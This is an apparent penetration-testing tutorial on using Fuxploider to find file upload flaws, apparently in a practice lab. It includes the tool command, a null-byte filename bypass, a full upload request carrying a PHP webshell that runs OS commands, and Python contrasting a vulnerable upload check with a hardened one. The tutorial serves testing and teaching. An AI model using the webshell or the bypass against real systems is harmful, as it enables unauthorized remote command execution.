Introduction
Identifying vulnerabilities in file upload functionality is often a tedious and time-consuming task, and many potential issues may be overlooked without automation. Fortunately, Fuxploider (available at https://github.com/almandin/fuxploider.git) significantly streamlines this process.
Fuxploider is an open-source penetration testing tool designed to automate the detection and exploitation of flaws in file upload forms. It identifies the allowed file types and determines the most effective technique for uploading web shells or other malicious files to the target web server.
Installation
We can install Fuxploider on our Kali test machine as follows:
git clone https://github.com/almandin/fuxploider.git
cd fuxploider
sudo apt install python3-coloredlogs
Manual enumeration
Next, we’ll need to perform some manual enumeration of our target host to discover the following:
- Any cookies that need to be included in our requests (e.g. session cookies, in the event authentication is required to reach the upload functionality)
- The error message shown when a file upload fails (this becomes our --not-regex parameter)
- The success message shown when an upload succeeds (to confirm that the error text used for --not-regex does not also appear in a successful response)
- Any additional POST request parameters, such as CSRF tokens
- The form ‘action’ and file input ‘name’ details for the upload form
We’ll be performing manual enumeration with our browser’s Web Developer Tools.
Discovery of session cookies
Open your browser’s Web Developer Tools (CTRL+SHIFT+I) then log into your target web-application and click on the “Storage” tab to view the session cookie value as shown below (i.e. lQzyZhww0CqeKZq81wjBCVpcnvnoVx1m):

File upload error message
Navigate to the target upload area of the website and attempt to upload a restricted file to observe the error message (e.g. “Sorry, only JPG & PNG files are allowed Sorry, there was an error uploading your file.”):

Which gives us a not-regex text match of:
Sorry, only JPG
File upload success message
Now upload a valid image file and observe the success message (e.g. “The file avatars/image.png has been uploaded.”):

Additional POST form parameters
Additional parameters can be discovered by attempting a file upload, then viewing the “Network -> Request” tab in developer tools and clicking the upload POST request (also note that a failed upload returns a 403):

These values are:
user=wiener
csrf=9MYCOLRwVnMtzy2edrpX1u7ctBjdt958
Form ‘action’ and file ‘name’
We can view the ‘action’ and file input ‘name’ parameters for the upload form (including the previous parameters) by viewing the source for the webpage (CTRL+U):

Which gives us:
action="/my-account/avatar"
name=avatar
Upload testing
We now have everything we need to run Fuxploider.
Based on the information enumerated above, we can construct the following command:
python3 fuxploider.py --cookies "session=lQzyZhww0CqeKZq81wjBCVpcnvnoVx1m" -u "https://TARGETDOMAIN/my-account" -d "user=wiener&csrf=9MYCOLRwVnMtzy2edrpX1u7ctBjdt958" --not-regex "Sorry, only JPG" -m --input-name avatar --form-action "/my-account/avatar" -T 1 -U "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" -s -l "jpg,png" -v 2>&1 | tee results.txt
Our results are printed to the screen and saved to a results.txt file. Also, since we’ve included the verbose flag, we’ll be able to see the host respond with 403 (for failed attempts) and 200 (for success). We can grep our results file to view testable upload parameters as follows:
grep -B 2 " 200 " results.txt
2025-04-02 10:36:14 DEBUG - Sending file tmp13e58o3p.php%00.jpg with mime type: image/jpeg
2025-04-02 10:36:14 DEBUG - Resetting dropped connection:
2025-04-02 10:36:16 DEBUG - "POST /my-account/avatar HTTP/1.1" 200 136
This indicates that we can potentially upload a PHP file with a null byte (%00) after the .php extension and before an accepted .jpg extension to bypass upload restrictions: the extension check sees a name ending in .jpg, while a lower layer that treats the null byte as a string terminator stores the file as .php.
We can test this manually in developer tools (or an intercepting proxy such as ZAP, which may be preferable if issues are encountered) as follows (Network -> Headers -> Resend):
-----------------------------239164623424479637602836869776
Content-Disposition: form-data; name="avatar"; filename="shell.php%00.jpg"
Content-Type: application/x-php
<?php echo system($_GET['command']); ?>
-----------------------------239164623424479637602836869776
Content-Disposition: form-data; name="user"
wiener
-----------------------------239164623424479637602836869776
Content-Disposition: form-data; name="csrf"
9MYCOLRwVnMtzy2edrpX1u7ctBjdt958
-----------------------------239164623424479637602836869776--
Which is successful, as the application responds with:

Meaning we can now test our webshell by executing operating system commands:

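The bypass above works because the extension check sees the full name ending in .jpg while the layer that writes the file stops at the null byte. As an added example (not part of the original post or of Fuxploider itself), here is that vulnerable check beside a hardened one that rejects control bytes and double extensions and derives the stored name from the file’s magic bytes instead of the client’s filename; the function names and the constructed sample names are assumptions.

```python
import re
import uuid
from typing import Optional
from urllib.parse import unquote

ALLOWED_EXTENSIONS = {"jpg", "png"}
# Leading bytes of the two image types the avatar form accepts.
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpg"}


def naive_is_allowed(filename: str) -> bool:
    """Vulnerable check: trusts whatever follows the last dot of the raw name."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXTENSIONS


def effective_name(filename: str) -> str:
    """The name a NUL-terminated file API ends up using: decoded, cut at the first NUL."""
    return unquote(filename).split("\x00", 1)[0]


def hardened_is_allowed(filename: str) -> bool:
    """Reject control bytes, path separators and any name that is not stem.ext."""
    decoded = unquote(filename)
    if any(ord(c) < 32 for c in decoded) or "/" in decoded or "\\" in decoded:
        return False
    # Exactly one dot, so 'shell.php.jpg' style double extensions cannot match.
    return re.fullmatch(r"[a-z0-9_-]{1,64}\.(jpg|png)", decoded.lower()) is not None


def sniff_image_type(data: bytes) -> Optional[str]:
    """Decide the type from the file's leading bytes rather than its declared name."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def server_side_name(data: bytes) -> str:
    """Ignore the client's filename entirely: random stem plus the sniffed extension."""
    ext = sniff_image_type(data)
    if ext is None:
        raise ValueError("not a JPG or PNG image")
    return f"{uuid.uuid4().hex}.{ext}"
```

Run against the same names Fuxploider sends, the naive check accepts the null-byte variant while the hardened check rejects it and every double-extension variant.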
Conclusion
This concludes the basic use of Fuxploider.
Feel free to contact us if you have any questions or would like to schedule a meeting to discuss anything further, including having your web-applications or upload functionality security tested.